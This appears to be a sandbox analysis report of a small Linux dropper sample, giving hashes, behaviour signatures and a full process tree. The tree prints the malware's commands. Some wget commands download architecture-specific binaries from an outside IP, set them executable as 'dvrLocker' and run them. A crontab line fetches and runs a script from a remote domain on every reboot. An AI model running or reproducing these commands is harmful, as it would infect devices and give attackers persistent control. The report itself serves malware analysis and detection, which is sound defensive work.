Analysis
- max time kernel: 150s
- max time network: 138s
- platform: debian-9_armhf
- resource: debian9-armhf-20240729-en
- resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 27/11/2024, 02:39
Static task
- static1
Behavioral tasks
- behavioral1: sample 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown, resource debian9-armhf-20240729-en
- behavioral3: sample 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown, resource debian9-mipsbe-20240418-en
- behavioral4: sample 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown, resource debian9-mipsel-20240226-en
General
- Target: 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown
- Size: 913B
- MD5: c18ef2271ad912c7542293151373ffa0
- SHA1: 65fb65c17671657fc431173051fe794c6c63007d
- SHA256: 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b
- SHA512: fb9a3ec37ee5f8f71b343285f034a6c27520fdc6525b217b411023b4c9741282cd36354442853caa50a2d2fe54dfb6e8f8453f36cdd773573435062f82bcdfc9
Malware Config
Signatures
File and Directory Permissions Modification (1 TTP, 8 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
- PID 811: sh
- PID 820: chmod
- PID 824: chmod
- PID 828: chmod
- PID 832: chmod
- PID 792: chmod
- PID 804: chmod
- PID 809: chmod
Executes dropped EXE (7 IoCs)
- /tmp/lib/dvrLocker, PID 793: dvrLocker
- /tmp/lib/dvrLocker, PID 805: dvrLocker
- /tmp/lib/dvrLocker, PID 810: dvrLocker
- /tmp/lib/dvrLocker, PID 821: dvrLocker
- /tmp/lib/dvrLocker, PID 825: dvrLocker
- /tmp/lib/dvrLocker, PID 829: dvrLocker
- /tmp/lib/dvrLocker, PID 833: dvrLocker
Renames itself (1 IoC)
- PID 810: dvrLocker
Unexpected DNS network traffic destination (1 IoC)
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
- Destination IP: 168.235.111.72
Creates/modifies Cron job (1 TTP, 1 IoC)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
- File opened for modification: /var/spool/cron/crontabs/tmp.7ecNDm (process crontab)
Enumerates running processes
Discovers information about currently running processes on the system.
Changes its process name (1 IoC)
Changes the process name, possibly in an attempt to hide itself.
- New name [watchdog/0], PID 810: dvrLocker
System Network Configuration Discovery (1 TTP, 2 IoCs)
Adversaries may gather information about the network configuration of a system.
- PID 807: rm
- PID 798: wget
Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
- File opened for modification: /tmp/lib/dvrLocker (process 6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown)
Processes
Each entry is executable: command line (PID) [matched signatures]; indented entries are child processes.
- /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown: /tmp/6b9b184965b98407c98536a87cb0b8272ccc28713f80531b5c5221b2630fac3b.unknown (PID 655) [Writes file to tmp directory]
  - /bin/ls: ls -l /proc/1/exe (PID 656)
  - /bin/ls: ls -l /proc/10/exe (PID 663)
  - /bin/ls: ls -l /proc/103/exe (PID 668) [Reads runtime system information]
  - /bin/ls: ls -l /proc/11/exe (PID 671)
  - /bin/ls: ls -l /proc/111/exe (PID 674) [Reads runtime system information]
  - /bin/ls: ls -l /proc/113/exe (PID 678)
  - /bin/ls: ls -l /proc/114/exe (PID 681)
  - /bin/ls: ls -l /proc/12/exe (PID 684) [Reads runtime system information]
  - /bin/ls: ls -l /proc/13/exe (PID 685) [Reads runtime system information]
  - /bin/ls: ls -l /proc/14/exe (PID 688)
  - /bin/ls: ls -l /proc/140/exe (PID 689)
  - /bin/ls: ls -l /proc/144/exe (PID 691) [Reads runtime system information]
  - /bin/ls: ls -l /proc/146/exe (PID 694) [Reads runtime system information]
  - /bin/ls: ls -l /proc/15/exe (PID 695)
  - /bin/ls: ls -l /proc/153/exe (PID 697)
  - /bin/ls: ls -l /proc/16/exe (PID 698)
  - /bin/ls: ls -l /proc/168/exe (PID 699)
  - /bin/ls: ls -l /proc/169/exe (PID 701) [Reads runtime system information]
  - /bin/ls: ls -l /proc/17/exe (PID 702)
  - /bin/ls: ls -l /proc/18/exe (PID 703) [Reads runtime system information]
  - /bin/ls: ls -l /proc/19/exe (PID 704) [Reads runtime system information]
  - /bin/ls: ls -l /proc/2/exe (PID 705)
  - /bin/ls: ls -l /proc/20/exe (PID 706)
  - /bin/ls: ls -l /proc/21/exe (PID 707)
  - /bin/ls: ls -l /proc/22/exe (PID 708) [Reads runtime system information]
  - /bin/ls: ls -l /proc/23/exe (PID 709) [Reads runtime system information]
  - /bin/ls: ls -l /proc/235/exe (PID 710)
  - /bin/ls: ls -l /proc/24/exe (PID 711) [Reads runtime system information]
  - /bin/ls: ls -l /proc/25/exe (PID 712) [Reads runtime system information]
  - /bin/ls: ls -l /proc/26/exe (PID 713) [Reads runtime system information]
  - /bin/ls: ls -l /proc/27/exe (PID 714)
  - /bin/ls: ls -l /proc/28/exe (PID 715) [Reads runtime system information]
  - /bin/ls: ls -l /proc/29/exe (PID 716)
  - /bin/ls: ls -l /proc/291/exe (PID 717)
  - /bin/ls: ls -l /proc/292/exe (PID 718)
  - /bin/ls: ls -l /proc/293/exe (PID 721) [Reads runtime system information]
  - /bin/ls: ls -l /proc/295/exe (PID 722) [Reads runtime system information]
  - /bin/ls: ls -l /proc/298/exe (PID 724)
  - /bin/ls: ls -l /proc/3/exe (PID 726) [Reads runtime system information]
  - /bin/ls: ls -l /proc/322/exe (PID 728)
  - /bin/ls: ls -l /proc/324/exe (PID 730)
  - /bin/ls: ls -l /proc/327/exe (PID 731)
  - /bin/ls: ls -l /proc/344/exe (PID 733)
  - /bin/ls: ls -l /proc/4/exe (PID 735) [Reads runtime system information]
  - /bin/ls: ls -l /proc/41/exe (PID 736)
  - /bin/ls: ls -l /proc/42/exe (PID 739)
  - /bin/ls: ls -l /proc/43/exe (PID 740) [Reads runtime system information]
  - /bin/ls: ls -l /proc/5/exe (PID 741)
  - /bin/ls: ls -l /proc/589/exe (PID 743) [Reads runtime system information]
  - /bin/ls: ls -l /proc/6/exe (PID 745)
  - /bin/ls: ls -l /proc/605/exe (PID 747) [Reads runtime system information]
  - /bin/ls: ls -l /proc/607/exe (PID 749) [Reads runtime system information]
  - /bin/ls: ls -l /proc/609/exe (PID 750) [Reads runtime system information]
  - /bin/ls: ls -l /proc/610/exe (PID 753) [Reads runtime system information]
  - /bin/ls: ls -l /proc/641/exe (PID 754)
  - /bin/ls: ls -l /proc/647/exe (PID 756)
  - /bin/ls: ls -l /proc/648/exe (PID 758) [Reads runtime system information]
  - /bin/ls: ls -l /proc/650/exe (PID 760)
  - /bin/ls: ls -l /proc/652/exe (PID 761) [Reads runtime system information]
  - /bin/ls: ls -l /proc/653/exe (PID 763) [Reads runtime system information]
  - /bin/ls: ls -l /proc/654/exe (PID 764)
  - /bin/ls: ls -l /proc/655/exe (PID 767) [Reads runtime system information]
  - /bin/ls: ls -l /proc/7/exe (PID 768)
  - /bin/ls: ls -l /proc/8/exe (PID 770)
  - /bin/ls: ls -l /proc/81/exe (PID 772)
  - /bin/ls: ls -l /proc/9/exe (PID 774) [Reads runtime system information]
  - /bin/rm: rm -rf /tmp/lib/ (PID 776)
  - /bin/rm: rm -rf /tmp/lib/dvrLocker (PID 777)
  - /bin/mkdir: mkdir /tmp/lib/ (PID 779) [Reads runtime system information]
  - /usr/bin/wget: wget http://45.125.66.90/mpsl -O - (PID 781)
  - /bin/chmod: chmod 777 dvrLocker (PID 792) [File and Directory Permissions Modification]
  - /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 793) [Executes dropped EXE]
  - /bin/rm: rm -rf mpsl (PID 796)
  - /usr/bin/wget: wget http://45.125.66.90/mips -O - (PID 798) [System Network Configuration Discovery]
  - /bin/chmod: chmod 777 dvrLocker (PID 804) [File and Directory Permissions Modification]
  - /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 805) [Executes dropped EXE]
  - /bin/rm: rm -rf mips (PID 807) [System Network Configuration Discovery]
  - /usr/bin/wget: wget http://45.125.66.90/arm -O - (PID 808)
  - /bin/chmod: chmod 777 dvrLocker (PID 809) [File and Directory Permissions Modification]
  - /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 810) [Executes dropped EXE; Renames itself; Changes its process name; Reads runtime system information]
    - /bin/sh: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" (PID 811) [File and Directory Permissions Modification]
      - /usr/bin/crontab: crontab - (PID 813) [Creates/modifies Cron job]
      - /usr/bin/crontab: crontab -l (PID 814)
  - /bin/rm: rm -rf arm (PID 818)
  - /usr/bin/wget: wget http://45.125.66.90/arm5 -O - (PID 819)
  - /bin/chmod: chmod 777 dvrLocker (PID 820) [File and Directory Permissions Modification]
  - /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 821) [Executes dropped EXE]
  - /usr/bin/wget: wget http://45.125.66.90/ppc -O - (PID 823)
  - /bin/chmod: chmod 777 dvrLocker (PID 824) [File and Directory Permissions Modification]
  - /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 825) [Executes dropped EXE]
  - /usr/bin/wget: wget http://45.125.66.90/arm7 -O - (PID 827)
  - /bin/chmod: chmod 777 dvrLocker (PID 828) [File and Directory Permissions Modification]
  - /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 829) [Executes dropped EXE]
  - /bin/rm: rm -rf arm7 (PID 830)
  - /usr/bin/wget: wget http://45.125.66.90/arm6 -O - (PID 831)
  - /bin/chmod: chmod 777 dvrLocker (PID 832) [File and Directory Permissions Modification]
  - /tmp/lib/dvrLocker: ./dvrLocker tplink.new (PID 833) [Executes dropped EXE]
  - /bin/rm: rm -rf /mnt/dvrLocker (PID 835)
Network
MITRE ATT&CK Enterprise v15
Downloads